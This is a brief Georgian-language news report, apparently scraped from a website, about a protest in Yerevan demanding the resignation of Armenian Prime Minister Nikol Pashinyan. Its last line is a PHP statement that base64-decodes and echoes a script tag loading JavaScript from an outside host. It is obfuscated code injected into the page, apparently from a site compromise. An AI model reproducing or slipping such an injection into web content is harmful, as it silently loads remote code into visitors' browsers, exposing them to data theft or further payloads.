celsiusi
ავერსი შნაიდერი
სომხეთის დედაქალაქში, პარლამენტის შენობასთან აქცია იმართება. შეკრებილი მოქალაქეები ქვეყნის პრემიერ-მინისტრის, ნიკოლ ფაშინიანის თანამდებობიდან გადადგომას ითხოვენ.
 
სომხური მედიის ინფორმაციით, აქციის მონაწილეებმა ბაგრამიანის გამზირი გადაკეტეს. აქციის მონაწილეები უთანხმოებას გამოხატავენ ხელისუფლების პოლიტიკასთან დაკავშირებით და ქვეყნის მთავრობას სომხეთისა და არცახის ინტერესების დაუცველობაში ადანაშაულებენ.
 
„წადი!“- სკანდირებენ აქციის მონაწილეები.
 
ამასთან, იმავე მოთხოვნით ერევანში, რესპუბლიკის მოედანზე, მთავრობის შენობასთან, კიდევ ერთი საპროტესტო აქცია მიმდინარეობს.
379
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");